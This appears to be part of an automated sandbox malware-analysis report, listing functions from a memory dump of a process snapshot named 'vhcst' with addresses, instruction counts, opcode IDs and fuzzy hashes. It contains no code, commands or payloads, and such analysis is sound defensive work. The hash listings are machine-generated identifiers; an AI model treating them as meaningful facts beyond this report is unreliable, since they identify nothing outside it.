                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 97700f8e708ac8051665e969285dadc60b956b0e41bc8ecb989f31c0484c62ff
                                                                                      • Instruction ID: bce0a44e5ded27b693e92787ae8f0dab4876024cfbd48ec139e64e33ce54d77e
                                                                                      • Opcode Fuzzy Hash: 97700f8e708ac8051665e969285dadc60b956b0e41bc8ecb989f31c0484c62ff
                                                                                      • Instruction Fuzzy Hash: E1F0CD30B19E084FE7A8EAAD9498A3273D2FBAC319710017DD40DC3396DC26E882C381
                                                                                      Function 00007FFD99E117C9 Relevance: .0, Instructions: 47COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e548d12bb6e193d54924a48e173409b5d01f83692938c6dcc175802c8305d7dc
                                                                                      • Instruction ID: 1c06a958b6d2cd2b30faaeb1e2357a1388eaa898d8bc5f76382d46181f5cfa1e
                                                                                      • Opcode Fuzzy Hash: e548d12bb6e193d54924a48e173409b5d01f83692938c6dcc175802c8305d7dc
                                                                                      • Instruction Fuzzy Hash: 9B01D43160DBC91FC795DB18D4A05A67BE1EF85324F44057EF089C6292CA2599408782
                                                                                      Function 00007FFD99E59670 Relevance: .0, Instructions: 47COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6d5b8c92eecfaf18bec402936e4aa9758987759f8c91436b6e3b5752beec1b91
                                                                                      • Instruction ID: d7c952bdde2d4cac15e4ccbac68f27f7b8c949c125a4cddb1097518fdba3f7e3
                                                                                      • Opcode Fuzzy Hash: 6d5b8c92eecfaf18bec402936e4aa9758987759f8c91436b6e3b5752beec1b91
                                                                                      • Instruction Fuzzy Hash: BFF0DA30705C0E8FDAA4FB5CD4A8A6973E6EF9836175902A6E40DC7265DE64DC41CB82
                                                                                      Function 00007FFD99E1617C Relevance: .0, Instructions: 45COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cb6c9bc658378f1ee1f8d7d6f4bdda5ba6f4e0c16c873213dccb30b44baa455c
                                                                                      • Instruction ID: c6c6f7633760bca9a861523a8b703368b019a252c118771383c29a3b9272d545
                                                                                      • Opcode Fuzzy Hash: cb6c9bc658378f1ee1f8d7d6f4bdda5ba6f4e0c16c873213dccb30b44baa455c
                                                                                      • Instruction Fuzzy Hash: FEF08162F0991D4FEB64EBA844A66ED77E1EF58341F400176E51CD7286DE2869404782
                                                                                      Function 00007FFD99E16180 Relevance: .0, Instructions: 44COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5e35a48050ef22f66928739aa61f30a4dcbf8c77424a4a81d75237bdeb5acb3d
                                                                                      • Instruction ID: 19e40f0c40cd256cdb2e2efc9f90e14b44cf1477d246c26e2d16a75aacbb748f
                                                                                      • Opcode Fuzzy Hash: 5e35a48050ef22f66928739aa61f30a4dcbf8c77424a4a81d75237bdeb5acb3d
                                                                                      • Instruction Fuzzy Hash: 09F0AF71F0491C4FEB54ABA884566EDB7E0EF48341F400177E51CD3286DE3869404BC1
                                                                                      Function 00007FFD99E117E0 Relevance: .0, Instructions: 44COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2010168ab6d750f25a5a7e9336e689d980f55f655cd15c17ce08c80d6f9a409c
                                                                                      • Instruction ID: 832f34c23a1072bdd08f9a1ddf94c7d0c299b33d304f6f67d9130e09f6d371a2
                                                                                      • Opcode Fuzzy Hash: 2010168ab6d750f25a5a7e9336e689d980f55f655cd15c17ce08c80d6f9a409c
                                                                                      • Instruction Fuzzy Hash: F7F0A47261DB895BD7A8DA08D4605BB77E1FFC8354F44093EF04AD3350CE62D8418782
                                                                                      Function 00007FFD99E2C7A0 Relevance: .0, Instructions: 43COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0fd160b57bf954ac53d4d66ca5e6591cb33d901d50af8e568aadf7cee9b8e05f
                                                                                      • Instruction ID: 5b1d09e82f3702e3dedde6a433fe87694b22f41822a08ae4b34f260241af5b7d
                                                                                      • Opcode Fuzzy Hash: 0fd160b57bf954ac53d4d66ca5e6591cb33d901d50af8e568aadf7cee9b8e05f
                                                                                      • Instruction Fuzzy Hash: E1F08130B19E1A8FEAB9EA7584A4672B3E1FB58309F10447CD05ED2584DE25E8828746
                                                                                      Function 00007FFD99E15F03 Relevance: .0, Instructions: 43COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7eb16360f4a1c8ed3af72834c7d68db9c7c4ee6dd056f452dd7f9a54a13860ce
                                                                                      • Instruction ID: da5d4cf689b86ad1fa17a16b923127753db36b1334b67ab07e6293fe214759ca
                                                                                      • Opcode Fuzzy Hash: 7eb16360f4a1c8ed3af72834c7d68db9c7c4ee6dd056f452dd7f9a54a13860ce
                                                                                      • Instruction Fuzzy Hash: 28F0C851F1994647F7B47AAC08B677456C2DFD8258F0981B9D01DC31DBEC4A79061243
                                                                                      Function 00007FFD99E258D8 Relevance: .0, Instructions: 42COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ff3e84912bef9ab28540fd3546c3d620dd26453f07a939dc4d230e0e3e95f997
                                                                                      • Instruction ID: e152914ea7bd29b04de473013282352dc1069280eae185973c23e22e213dfa64
                                                                                      • Opcode Fuzzy Hash: ff3e84912bef9ab28540fd3546c3d620dd26453f07a939dc4d230e0e3e95f997
                                                                                      • Instruction Fuzzy Hash: FCF0CD31E1D7454AE750FB6C845557DBBD0FF88318F04097AE89DC1165EE24E5414743
                                                                                      Function 00007FFD99E63D18 Relevance: .0, Instructions: 42COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b4720873401936295c305338357cae29d278bbec9d113646e90917130e2b456c
                                                                                      • Instruction ID: 15e538e74853e5cd44572b5950c4e3de81d3a82865abc959826af6225bcd9478
                                                                                      • Opcode Fuzzy Hash: b4720873401936295c305338357cae29d278bbec9d113646e90917130e2b456c
                                                                                      • Instruction Fuzzy Hash: A8F0F42071990E8FDEA4EE6CC4A992473D0FF6434876445B8D40EC7191ED16EC46C701
                                                                                      Function 00007FFD99E1E4AC Relevance: .0, Instructions: 42COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9ff7a62969becdc6d5d9b3d801d19d03a9ade0a7123329175309f85c93e21b84
                                                                                      • Instruction ID: f5d87105b706e64c5493a9d805cabbd51957991679e832b33d2f4d780f020c38
                                                                                      • Opcode Fuzzy Hash: 9ff7a62969becdc6d5d9b3d801d19d03a9ade0a7123329175309f85c93e21b84
                                                                                      • Instruction Fuzzy Hash: 63F04932A0DB4906F334DA7498655EA77C1FBD0364F04073DF095970E0EE59A14987C3
                                                                                      Function 00007FFD99E2AF5D Relevance: .0, Instructions: 41COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4686a02ff7b0e89711f1d392bdaa31a9867483cdc83496ba0be36b126459a59c
                                                                                      • Instruction ID: 314a2a8283c4148d751a4a5a52d27b49595b73539b84d8e36584a99ace3a1a27
                                                                                      • Opcode Fuzzy Hash: 4686a02ff7b0e89711f1d392bdaa31a9867483cdc83496ba0be36b126459a59c
                                                                                      • Instruction Fuzzy Hash: B9F0E511B1A81B07B66475EE38E95FE5389DFD81297488277E04CC21CBDD4968464292
                                                                                      Function 00007FFD99E1F410 Relevance: .0, Instructions: 36COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1a457bdc41e3ca963cee14bffe15bea778f21e6a99e07c15f69e0bb4be62d1ed
                                                                                      • Instruction ID: f137ae18edb05d3b96b1b6ff20af140d637fc351851511e3c86a2fb445aae6aa
                                                                                      • Opcode Fuzzy Hash: 1a457bdc41e3ca963cee14bffe15bea778f21e6a99e07c15f69e0bb4be62d1ed
                                                                                      • Instruction Fuzzy Hash: BCF05431928B094AE794FF28955967AB7E0EF98359F040E3BEC9DD2160EF24D6804686
                                                                                      Function 00007FFD99E1655C Relevance: .0, Instructions: 34COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 569d68b33f5f39b6c830b1273746695b24de601bc2b6708c8709f80af40e7bdd
                                                                                      • Instruction ID: 3392d4edb41707560f3dab24fab4e06cf10bce2347c836b3eb3714be7b8615d0
                                                                                      • Opcode Fuzzy Hash: 569d68b33f5f39b6c830b1273746695b24de601bc2b6708c8709f80af40e7bdd
                                                                                      • Instruction Fuzzy Hash: D9F08C61A1988C4FEB90FB7C84697A97BE1EF89300F0800FAE45DC72E6DD28AD054742
                                                                                      Function 00007FFD99E5B4E0 Relevance: .0, Instructions: 31COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7df3e81df035cc74714cfff3c2cf99da1fbe506cf9417bb76800f42a983f3b6d
                                                                                      • Instruction ID: 95c20ab7b1a618c514f516707c58ad17da7917b25393070aee7263613881efd2
                                                                                      • Opcode Fuzzy Hash: 7df3e81df035cc74714cfff3c2cf99da1fbe506cf9417bb76800f42a983f3b6d
                                                                                      • Instruction Fuzzy Hash: 68E09B31B0F42A56DA74E99924E52F91391DF8922DB580576D44DC21DEDD1B6C8283C3
                                                                                      Function 00007FFD99E11A60 Relevance: .0, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9e49409877c2401f891850059c4c41b359974a155694d785cdf5a7756b56ffd3
                                                                                      • Instruction ID: 5a4e856679cf63666b5aba78f61d71a4704aa7db9da9297ead49480da1dad5e4
                                                                                      • Opcode Fuzzy Hash: 9e49409877c2401f891850059c4c41b359974a155694d785cdf5a7756b56ffd3
                                                                                      • Instruction Fuzzy Hash: C7E0D872A0DB4C4FDB74AE59A8645E97BA4EB85318F040069E45DC6281D6226885C352
                                                                                      Function 00007FFD99E5A080 Relevance: .0, Instructions: 28COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8ea97e791126ec0bb7a7c5d00f1dd43287e912bcd002349cff1f0e50c189a03d
                                                                                      • Instruction ID: 17f71f2a2c6f5be8c624eefe91fc64b61b4de2c908b60ab222363d387da462e0
                                                                                      • Opcode Fuzzy Hash: 8ea97e791126ec0bb7a7c5d00f1dd43287e912bcd002349cff1f0e50c189a03d
                                                                                      • Instruction Fuzzy Hash: 03E04610F1A92A02F9B629E924A53B821C08F19328B0400B2E80CC628AEC0E6CDA02C7
                                                                                      Function 00007FFD99E10CFD Relevance: .0, Instructions: 25COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 70e8918fe7371c9bab7c28701d053cb59719dfdc8c999140cfded29c7f65db44
                                                                                      • Instruction ID: f8da2cb99852476daf7e7f9bb01bb9555d9c600ee672a5b5ee5a5ba0cd79f433
                                                                                      • Opcode Fuzzy Hash: 70e8918fe7371c9bab7c28701d053cb59719dfdc8c999140cfded29c7f65db44
                                                                                      • Instruction Fuzzy Hash: 62E0C221F5980E4AEB60BBB42C7AAFDB286DFC8209FC40831E01DC20DBCD2A29054183
                                                                                      Function 00007FFD99E25EF8 Relevance: .0, Instructions: 25COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 76793d08e2dcad83b3ea887de2be0cf5b97587114a45d8466a536ba86e10db6d
                                                                                      • Instruction ID: 0e51aaf40da5f59b3db01a00ddb527654af5b1789c81ac53075d8f871b3a6c01
                                                                                      • Opcode Fuzzy Hash: 76793d08e2dcad83b3ea887de2be0cf5b97587114a45d8466a536ba86e10db6d
                                                                                      • Instruction Fuzzy Hash: B3D01733B0EA095CF6786A8874A31FC7380EB85638B90013BE28F814829D0B34120287
                                                                                      Function 00007FFD99E1B9BC Relevance: .0, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 64d076844077c4e27197e6fe811f9492b59a824e958121d00f615a9b1ef57533
                                                                                      • Instruction ID: d770aa877b985583ab0e8b11552e34e530e5af56bbd9806093de806f220db4e2
                                                                                      • Opcode Fuzzy Hash: 64d076844077c4e27197e6fe811f9492b59a824e958121d00f615a9b1ef57533
                                                                                      • Instruction Fuzzy Hash: F6E0D83250DB490AD7209A24D4606EBBBA1FBC0320F440739E056461E6ED6AA5498683
                                                                                      Function 00007FFD99E25960 Relevance: .0, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b9688abc5c8787ed64a3ae226af430d3c411ea9dc0022fa6ebd289954a024f00
                                                                                      • Instruction ID: cd20de7cf0301827bea769ae521a0da24207a8702787593fe7f2416715835922
                                                                                      • Opcode Fuzzy Hash: b9688abc5c8787ed64a3ae226af430d3c411ea9dc0022fa6ebd289954a024f00
                                                                                      • Instruction Fuzzy Hash: 37E08C30608A044B9758EA2C808C92B7FE0DBEC365B140B3FB40DD3270DA308640878A
                                                                                      Function 00007FFD99E40900 Relevance: .0, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 00d0576be06ef66bdbf2456a7eaa26df0a417ae4f57ea05fdbbfbf91a513581a
                                                                                      • Instruction ID: a37ad90e0405e8b7c825af4d3a95a7dd487683b670602dbbc88ec0d8516867a7
                                                                                      • Opcode Fuzzy Hash: 00d0576be06ef66bdbf2456a7eaa26df0a417ae4f57ea05fdbbfbf91a513581a
                                                                                      • Instruction Fuzzy Hash: 33E0C242B1AA4D0BEF49EE3C0CEA0B477D2EBD464174981B69405CB0E2EC15384AC201
                                                                                      Function 00007FFD99E20D2D Relevance: .0, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c115d31cf0a2f7e15fdf279498e666ae750dfc6e061fc36f9d11469a5c1d1c7e
                                                                                      • Instruction ID: 884c9cfab29165336dfee0d67c954cd919a5ac8c0d09c849bb2c666844a18265
                                                                                      • Opcode Fuzzy Hash: c115d31cf0a2f7e15fdf279498e666ae750dfc6e061fc36f9d11469a5c1d1c7e
                                                                                      • Instruction Fuzzy Hash: 6AD05B11F4581D4EEB54BBB46C665FDB295DFC4209FC50436D41DC20D7DD1969150183
                                                                                      Function 00007FFD99E1C494 Relevance: .0, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 01e9cb3e2d135eb0db6dc780765f20e68e8c223b1d2f45c610b960c49168d00f
                                                                                      • Instruction ID: b39decfbd1fe6e04b1a0dc3fa402f133a89fa89b556c1c81f6163a500b75162f
                                                                                      • Opcode Fuzzy Hash: 01e9cb3e2d135eb0db6dc780765f20e68e8c223b1d2f45c610b960c49168d00f
                                                                                      • Instruction Fuzzy Hash: A5D06762B5E51959FA78AA8874E31FCB340EB85228B90117BD24EC15829D0B35225187
                                                                                      Function 00007FFD99E1D6ED Relevance: .0, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3e089d711fac11e20818723b499906d717be83a44c8cbdaa7adb0776dd106ed8
                                                                                      • Instruction ID: f4c46718018426b5649aa2b9b6902da3861f9be7f53c1318858e15b81e01cdd7
                                                                                      • Opcode Fuzzy Hash: 3e089d711fac11e20818723b499906d717be83a44c8cbdaa7adb0776dd106ed8
                                                                                      • Instruction Fuzzy Hash: 3FD01211F4581D4AEB64B7A468665FDB295DFC4108F850035D41DC2096DD1A15154182
                                                                                      Function 00007FFD99E4A7F0 Relevance: .0, Instructions: 22COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 80636cb529d036a1e39a6e71a3afba7869d0e946d4a247a892d65e98c37eceb3
                                                                                      • Instruction ID: 56204c85bc9fb067b9774582640de725451ae319639b5c0ee6ea8a6bbcac4976
                                                                                      • Opcode Fuzzy Hash: 80636cb529d036a1e39a6e71a3afba7869d0e946d4a247a892d65e98c37eceb3
                                                                                      • Instruction Fuzzy Hash: F3D0C230E28E1D0BDBB4BEB850947A572E0FF18318F400A6AD01AC3189DF68A88583C2
                                                                                      Function 00007FFD99E165AE Relevance: .0, Instructions: 21COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5b79da7d0691a5494c2352eb51f587e00601bdcadf9854d7157f63e6193407be
                                                                                      • Instruction ID: 388c5e819c45db5e826fb63734beb16c5c19d0ed9120c54324b2a2297cf531d5
                                                                                      • Opcode Fuzzy Hash: 5b79da7d0691a5494c2352eb51f587e00601bdcadf9854d7157f63e6193407be
                                                                                      • Instruction Fuzzy Hash: 55D0C922B088290AAB84B69D74153FDB2C2DBC8362F041477E62DC328ADD25585212C6
                                                                                      Function 00007FFD99E285D3 Relevance: .0, Instructions: 18COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a75cd808bf7ca033823a752cab431564b0acb30d936166e45456c473e03741fa
                                                                                      • Instruction ID: 5e5d317161e5d583472895ae1bd221b0b53de143bcf20527e7fc308f423a77f0
                                                                                      • Opcode Fuzzy Hash: a75cd808bf7ca033823a752cab431564b0acb30d936166e45456c473e03741fa
                                                                                      • Instruction Fuzzy Hash: ECD01212B0A26597C712BA58BCB65D677D04F5211C30D83B3D0A8890DBFC08614C8247
                                                                                      Function 00007FFD99E2795A Relevance: .0, Instructions: 17COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 45dcbd3a8f3b2c5e4a98546a115676124049023639b11bffc9124e6a205469ee
                                                                                      • Instruction ID: f51a85f6dbe8e66fe0406b76297443d03d5ec59c717a21812e464825b014ab3a
                                                                                      • Opcode Fuzzy Hash: 45dcbd3a8f3b2c5e4a98546a115676124049023639b11bffc9124e6a205469ee
                                                                                      • Instruction Fuzzy Hash: 11C08013A4EF0E06F960944D74565FDB7C0D7F5255F410377E059C5196DC0B648342C3
                                                                                      Function 00007FFD99E292BA Relevance: .0, Instructions: 17COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 14d57c057ca5059d9141a60b7e6bbe653a264337fb4445e794a6878c385c0277
